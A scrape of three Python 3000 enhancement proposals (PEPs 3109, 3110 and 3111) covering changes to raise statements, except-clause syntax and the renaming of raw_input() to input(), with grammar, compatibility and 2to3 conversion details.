(https://mail.python.org/pipermail/python-3000/2007-May/007615.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 3108 – Standard Library Reorganization | Standards Track | Just like the language itself, Python’s standard library (stdlib) has
grown over the years to be very rich. But over time some modules
have lost their need to be included with Python. There has also been
an introduction of a naming convention for modules since Python’s
inception that not all modules follow. |
PEP 3109 – Raising Exceptions in Python 3000
Author:
Collin Winter <collinwinter at google.com>
Status:
Final
Type:
Standards Track
Created:
19-Jan-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Grammar Changes
Changes to Builtin Types
Semantic Changes
Compatibility Issues
Implementation
References
Copyright
Abstract
This PEP introduces changes to Python’s mechanisms for raising
exceptions intended to reduce both line noise and the size of the
language.
Rationale
One of Python’s guiding maxims is “there should be one – and
preferably only one – obvious way to do it”. Python 2.x’s
raise statement violates this principle, permitting multiple
ways of expressing the same thought. For example, these statements
are equivalent:
raise E, V
raise E(V)
There is a third form of the raise statement, allowing arbitrary
tracebacks to be attached to an exception [1]:
raise E, V, T
where T is a traceback. As specified in PEP 344,
exception objects in Python 3.x will possess a __traceback__
attribute, admitting this translation of the three-expression
raise statement:
raise E, V, T
is translated to
e = E(V)
e.__traceback__ = T
raise e
Using these translations, we can reduce the raise statement from
four forms to two:
raise (with no arguments) is used to re-raise the active
exception in an except suite.
raise EXCEPTION is used to raise a new exception. This form has
two sub-variants: EXCEPTION may be an exception class or an
instance of an exception class; valid exception classes are
BaseException and its subclasses (PEP 352). If EXCEPTION
is a subclass, it will be called with no arguments to obtain
an exception instance.To raise anything else is an error.
There is a further, more tangible benefit to be obtained through this
consolidation, as noted by A.M. Kuchling [2].
PEP 8 doesn't express any preference between the
two forms of raise statements:
raise ValueError, 'blah'
raise ValueError("blah")
I like the second form better, because if the exception arguments
are long or include string formatting, you don't need to use line
continuation characters because of the containing parens.
The BDFL has concurred [3] and endorsed the
consolidation of the several raise forms.
Grammar Changes
In Python 3, the grammar for raise statements will change
from [1]
raise_stmt: 'raise' [test [',' test [',' test]]]
to
raise_stmt: 'raise' [test]
Changes to Builtin Types
Because of its relation to exception raising, the signature for the
throw() method on generator objects will change, dropping the
optional second and third parameters. The signature thus changes (PEP 342)
from
generator.throw(E, [V, [T]])
to
generator.throw(EXCEPTION)
Where EXCEPTION is either a subclass of BaseException or an
instance of a subclass of BaseException.
Semantic Changes
In Python 2, the following raise statement is legal
raise ((E1, (E2, E3)), E4), V
The interpreter will take the tuple’s first element as the exception
type (recursively), making the above fully equivalent to
raise E1, V
As of Python 3.0, support for raising tuples like this will be
dropped. This change will bring raise statements into line with
the throw() method on generator objects, which already disallows
this.
Compatibility Issues
All two- and three-expression raise statements will require
modification, as will all two- and three-expression throw() calls
on generators. Fortunately, the translation from Python 2.x to
Python 3.x in this case is simple and can be handled mechanically
by Guido van Rossum’s 2to3 utility [4] using the raise and
throw fixers ([5], [6]).
The following translations will be performed:
Zero- and one-expression raise statements will be left
intact.
Two-expression raise statements will be converted fromraise E, V
to
raise E(V)
Two-expression throw() calls will be converted from
generator.throw(E, V)
to
generator.throw(E(V))
See point #5 for a caveat to this transformation.
Three-expression raise statements will be converted fromraise E, V, T
to
e = E(V)
e.__traceback__ = T
raise e
Three-expression throw() calls will be converted from
generator.throw(E, V, T)
to
e = E(V)
e.__traceback__ = T
generator.throw(e)
See point #5 for a caveat to this transformation.
Two- and three-expression raise statements where E is a
tuple literal can be converted automatically using 2to3’s
raise fixer. raise statements where E is a non-literal
tuple, e.g., the result of a function call, will need to be
converted manually.
Two- and three-expression raise statements where E is an
exception class and V is an exception instance will need
special attention. These cases break down into two camps:
raise E, V as a long-hand version of the zero-argument
raise statement. As an example, assuming F is a subclass
of Etry:
something()
except F as V:
raise F(V)
except E as V:
handle(V)
This would be better expressed as
try:
something()
except F:
raise
except E as V:
handle(V)
raise E, V as a way of “casting” an exception to another
class. Taking an example from
distutils.compiler.unixcompilertry:
self.spawn(pp_args)
except DistutilsExecError as msg:
raise CompileError(msg)
This would be better expressed as
try:
self.spawn(pp_args)
except DistutilsExecError as msg:
raise CompileError from msg
Using the raise ... from ... syntax introduced in
PEP 344.
Implementation
This PEP was implemented in revision 57783 [7].
References
[1] (1, 2)
http://docs.python.org/reference/simple_stmts.html#raise
[2]
https://mail.python.org/pipermail/python-dev/2005-August/055187.html
[3]
https://mail.python.org/pipermail/python-dev/2005-August/055190.html
[4]
http://svn.python.org/view/sandbox/trunk/2to3/
[5]
http://svn.python.org/view/sandbox/trunk/2to3/fixes/fix_raise.py
[6]
http://svn.python.org/view/sandbox/trunk/2to3/fixes/fix_throw.py
[7]
http://svn.python.org/view/python/branches/py3k/Include/?rev=57783&view=rev
Copyright
This document has been placed in the public domain.
| Final | PEP 3109 – Raising Exceptions in Python 3000 | Standards Track | This PEP introduces changes to Python’s mechanisms for raising
exceptions intended to reduce both line noise and the size of the
language. |
PEP 3110 – Catching Exceptions in Python 3000
Author:
Collin Winter <collinwinter at google.com>
Status:
Final
Type:
Standards Track
Created:
16-Jan-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Grammar Changes
Semantic Changes
Compatibility Issues
2.6 - 3.0 Compatibility
Open Issues
Replacing or Dropping “sys.exc_info()”
Implementation
References
Copyright
Abstract
This PEP introduces changes intended to help eliminate ambiguities
in Python’s grammar, simplify exception classes, simplify garbage
collection for exceptions and reduce the size of the language in
Python 3.0.
Rationale
except clauses in Python 2.x present a syntactic ambiguity
where the parser cannot differentiate whetherexcept <expression>, <expression>:
should be interpreted as
except <type>, <type>:
or
except <type>, <name>:
Python 2 opts for the latter semantic, at the cost of requiring the
former to be parenthesized, like so
except (<type>, <type>):
As specified in PEP 352, the ability to treat exceptions
as tuples will be removed, meaning this code will no longer workexcept os.error, (errno, errstr):
Because the automatic unpacking will no longer be possible, it is
desirable to remove the ability to use tuples as except targets.
As specified in PEP 344, exception instances in Python 3
will possess a __traceback__ attribute. The Open Issues section
of that PEP includes a paragraph on garbage collection difficulties
caused by this attribute, namely a “exception -> traceback ->
stack frame -> exception” reference cycle, whereby all locals are
kept in scope until the next GC run. This PEP intends to resolve
this issue by adding a cleanup semantic to except clauses in
Python 3 whereby the target name is deleted at the end of the
except suite.
In the spirit of “there should be one – and preferably only one
– obvious way to do it”, it is desirable to consolidate
duplicate functionality. To this end, the exc_value,
exc_type and exc_traceback attributes of the sys
module [1] will be removed in favor of
sys.exc_info(), which provides the same information. These
attributes are already listed in PEP 3100 as targeted
for removal.
Grammar Changes
In Python 3, the grammar for except statements will change
from [4]
except_clause: 'except' [test [',' test]]
to
except_clause: 'except' [test ['as' NAME]]
The use of as in place of the comma token means that
except (AttributeError, os.error):
can be clearly understood as a tuple of exception classes. This new
syntax was first proposed by Greg Ewing [2] and
endorsed ([2], [3]) by the BDFL.
Further, the restriction of the token following as from test
to NAME means that only valid identifiers can be used as
except targets.
Note that the grammar above always requires parenthesized tuples as
exception classes. That way, the ambiguous
except A, B:
which would mean different things in Python 2.x and 3.x – leading to
hard-to-catch bugs – cannot legally occur in 3.x code.
Semantic Changes
In order to resolve the garbage collection issue related to PEP 344,
except statements in Python 3 will generate additional bytecode to
delete the target, thus eliminating the reference cycle.
The source-to-source translation, as suggested by Phillip J. Eby
[5], is
try:
try_body
except E as N:
except_body
...
gets translated to (in Python 2.5 terms)
try:
try_body
except E, N:
try:
except_body
finally:
N = None
del N
...
An implementation has already been checked into the py3k (formerly
“p3yk”) branch [6].
Compatibility Issues
Nearly all except clauses will need to be changed. except
clauses with identifier targets will be converted from
except E, N:
to
except E as N:
except clauses with non-tuple, non-identifier targets
(e.g., a.b.c[d]) will need to be converted from
except E, T:
to
except E as t:
T = t
Both of these cases can be handled by Guido van Rossum’s 2to3
utility [7] using the except fixer [8].
except clauses with tuple targets will need to be converted
manually, on a case-by-case basis. These changes will usually need
to be accompanied by changes to the exception classes themselves.
While these changes generally cannot be automated, the 2to3
utility is able to point out cases where the target of an except
clause is a tuple, simplifying conversion.
Situations where it is necessary to keep an exception instance around
past the end of the except suite can be easily translated like so
try:
...
except E as N:
...
...
becomes
try:
...
except E as N:
n = N
...
...
This way, when N is deleted at the end of the block, n will
persist and can be used as normal.
Lastly, all uses of the sys module’s exc_type, exc_value
and exc_traceback attributes will need to be removed. They can be
replaced with sys.exc_info()[0], sys.exc_info()[1] and
sys.exc_info()[2] respectively, a transformation that can be
performed by 2to3’s sysexcattrs fixer.
2.6 - 3.0 Compatibility
In order to facilitate forwards compatibility between Python 2.6 and 3.0,
the except ... as ...: syntax will be backported to the 2.x series. The
grammar will thus change from:
except_clause: 'except' [test [',' test]]
to:
except_clause: 'except' [test [('as' | ',') test]]
The end-of-suite cleanup semantic for except statements will not be
included in the 2.x series of releases.
Open Issues
Replacing or Dropping “sys.exc_info()”
The idea of dropping sys.exc_info() or replacing it with a
sys.exception attribute or a sys.get_exception() function
has been raised several times on python-3000 ([9],
[10]) and mentioned in PEP 344’s “Open Issues” section.
While a 2to3 fixer to replace calls to sys.exc_info()
and some attribute accesses would be trivial, it would be far more
difficult for static analysis to find and fix functions that expect
the values from sys.exc_info() as arguments. Similarly, this does
not address the need to rewrite the documentation for all APIs that
are defined in terms of sys.exc_info().
Implementation
This PEP was implemented in revisions 53342 [11] and 53349
[12]. Support for the new except syntax in 2.6 was
implemented in revision 55446 [13].
References
[1]
http://docs.python.org/library/sys.html
[2] (1, 2)
https://mail.python.org/pipermail/python-dev/2006-March/062449.html
[3]
https://mail.python.org/pipermail/python-dev/2006-March/062640.html
[4]
http://docs.python.org/reference/compound_stmts.html#try
[5]
https://mail.python.org/pipermail/python-3000/2007-January/005395.html
[6]
http://svn.python.org/view?rev=53342&view=rev
[7]
https://hg.python.org/sandbox/guido/file/2.7/Lib/lib2to3/
[8]
https://hg.python.org/sandbox/guido/file/2.7/Lib/lib2to3/fixes/fix_except.py
[9]
https://mail.python.org/pipermail/python-3000/2007-January/005385.html
[10]
https://mail.python.org/pipermail/python-3000/2007-January/005604.html
[11]
http://svn.python.org/view?view=revision&revision=53342
[12]
http://svn.python.org/view?view=revision&revision=53349
[13]
http://svn.python.org/view/python/trunk/?view=rev&rev=55446
Copyright
This document has been placed in the public domain.
| Final | PEP 3110 – Catching Exceptions in Python 3000 | Standards Track | This PEP introduces changes intended to help eliminate ambiguities
in Python’s grammar, simplify exception classes, simplify garbage
collection for exceptions and reduce the size of the language in
Python 3.0. |
PEP 3111 – Simple input built-in in Python 3000
Author:
Andre Roberge <andre.roberge at gmail.com>
Status:
Final
Type:
Standards Track
Created:
13-Sep-2006
Python-Version:
3.0
Post-History:
22-Dec-2006
Table of Contents
Abstract
Motivation
Rationale
Specification
Naming Discussion
References
Copyright
Abstract
Input and output are core features of computer programs. Currently,
Python provides a simple means of output through the print keyword
and two simple means of interactive input through the input()
and raw_input() built-in functions.
Python 3.0 will introduce various incompatible changes with previous
Python versions (PEP 3100).
Among the proposed changes, print will become a built-in
function, print(), while input() and raw_input() would be removed completely
from the built-in namespace, requiring importing some module to provide
even the most basic input capability.
This PEP proposes that Python 3.0 retains some simple interactive user
input capability, equivalent to raw_input(), within the built-in namespace.
It was accepted by the BDFL in December 2006 [5].
Motivation
With its easy readability and its support for many programming styles
(e.g. procedural, object-oriented, etc.) among others, Python is perhaps
the best computer language to use in introductory programming classes.
Simple programs often need to provide information to the user (output)
and to obtain information from the user (interactive input).
Any computer language intended to be used in an educational setting should
provide straightforward methods for both output and interactive input.
The current proposals for Python 3.0
include a simple output pathway
via a built-in function named print(), but a more complicated method for
input [e.g. via sys.stdin.readline()], one that requires importing an external
module. Current versions of Python (pre-3.0) include raw_input() as a
built-in function. With the availability of such a function, programs that
require simple input/output can be written from day one, without requiring
discussions of importing modules, streams, etc.
Rationale
Current built-in functions, like input() and raw_input(), are found to be
extremely useful in traditional teaching settings. (For more details,
see [2] and the discussion that followed.)
While the BDFL has clearly stated [3] that input() was not to be kept in
Python 3000, he has also stated that he was not against revising the
decision of killing raw_input().
raw_input() provides a simple mean to ask a question and obtain a response
from a user. The proposed plans for Python 3.0 would require the replacement
of the single statement:
name = raw_input("What is your name?")
by the more complicated:
import sys
print("What is your name?")
same = sys.stdin.readline()
However, from the point of view of many Python beginners and educators, the
use of sys.stdin.readline() presents the following problems:
1. Compared to the name “raw_input”, the name “sys.stdin.readline()”
is clunky and inelegant.
2. The names “sys” and “stdin” have no meaning for most beginners,
who are mainly interested in what the function does, and not where
in the package structure it is located. The lack of meaning also makes
it difficult to remember:
is it “sys.stdin.readline()”, or “ stdin.sys.readline()”?
To a programming novice, there is not any obvious reason to prefer
one over the other. In contrast, functions simple and direct names like
print, input, and raw_input, and open are easier to remember.
3. The use of “.” notation is unmotivated and confusing to many beginners.
For example, it may lead some beginners to think “.” is a standard
character that could be used in any identifier.
4. There is an asymmetry with the print function: why is print not called
sys.stdout.print()?
Specification
The existing raw_input() function will be renamed to input().
The Python 2 to 3 conversion tool will replace calls to input() with
eval(input()) and raw_input() with input().
Naming Discussion
With input() effectively removed from the language,
the name raw_input() makes much less sense and alternatives should be
considered. The various possibilities mentioned in various forums include:
ask()
ask_user()
get_string()
input() # initially rejected by BDFL, later accepted
prompt()
read()
user_input()
get_response()
While it was initially rejected by the BDFL, it has been suggested that the
most direct solution would be to rename “raw_input” to “input” in Python 3000.
The main objection is that Python 2.x already has a function named “input”,
and, even though it is not going to be included in Python 3000,
having a built-in function with the same name but different semantics may
confuse programmers migrating from 2.x to 3000. Certainly, this is no problem
for beginners, and the scope of the problem is unclear for more experienced
programmers, since raw_input(), while popular with many, is not in
universal use. In this instance, the good it does for beginners could be
seen to outweigh the harm it does to experienced programmers -
although it could cause confusion for people reading older books or tutorials.
The rationale for accepting the renaming can be found here [4].
References
[2]
The fate of raw_input() in Python 3000
https://mail.python.org/pipermail/edu-sig/2006-September/006967.html
[3]
Educational aspects of Python 3000
https://mail.python.org/pipermail/python-3000/2006-September/003589.html
[4]
Rationale for going with the straight renaming
https://mail.python.org/pipermail/python-3000/2006-December/005249.html
[5]
BDFL acceptance of the PEP
https://mail.python.org/pipermail/python-3000/2006-December/005257.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3111 – Simple input built-in in Python 3000 | Standards Track | Input and output are core features of computer programs. Currently,
Python provides a simple means of output through the print keyword
and two simple means of interactive input through the input()
and raw_input() built-in functions. |